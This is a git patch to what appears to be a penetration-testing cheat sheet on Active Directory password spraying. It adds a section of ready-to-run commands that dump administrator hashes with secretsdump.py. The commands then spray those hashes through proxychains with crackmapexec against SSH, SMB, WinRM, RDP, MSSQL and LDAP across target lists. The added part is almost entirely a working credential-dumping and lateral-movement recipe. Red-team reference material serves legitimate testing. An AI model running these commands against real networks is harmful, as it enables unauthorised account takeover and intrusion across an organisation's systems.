From 2143a1a52e71ae4bf21372b62709107e43c9f051 Mon Sep 17 00:00:00 2001
From: NoPurposeInLife <30126475+NoPurposeInLife@users.noreply.github.com>
Date: Thu, 25 Jul 2024 21:49:15 +0800
Subject: [PATCH] Update pwd-spraying.md
---
 docs/active-directory/pwd-spraying.md | 26 +++++++++++++++++++++++++-
 1 file changed, 25 insertions(+), 1 deletion(-)
diff --git a/docs/active-directory/pwd-spraying.md b/docs/active-directory/pwd-spraying.md
index 3c9b487..e03eea6 100644
--- a/docs/active-directory/pwd-spraying.md
+++ b/docs/active-directory/pwd-spraying.md
@@ -68,6 +68,30 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10
 ```
+## Spray passwords against everything
+* Using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
+```
+> Take Administrator Password from mimikatz and secretsdump.py (Make sure you copy and save all the hash into hashes.txt)
+proxychains4 -q -f /etc/proxychains_9052.conf python secretsdump.py -hashes :077a55c458dc4002dfdc5321a7659526 EXAMPLE.COM/Administrator@sql01.example.com
+
+echo "" >> users.txt
+echo "Administrator" >> users.txt
+echo "Guest" >> users.txt
+echo "DefaultAccount" >> users.txt
+echo "WDAGUtilityAccount" >> users.txt
+proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt -d example.com targets.txt | grep "\[+\]"
+proxychains4 -q ./cme ssh --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme smb --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme winrm --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme rdp --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme mssql --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+proxychains4 -q ./cme ldap --continue-on-success -u users.txt -H hashes.txt --local-auth targets.txt | grep "\[+\]"
+```
 ## BadPwdCount attribute
@@ -77,4 +101,4 @@ Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
 LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet:
 LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet:
-```
\ No newline at end of file
+```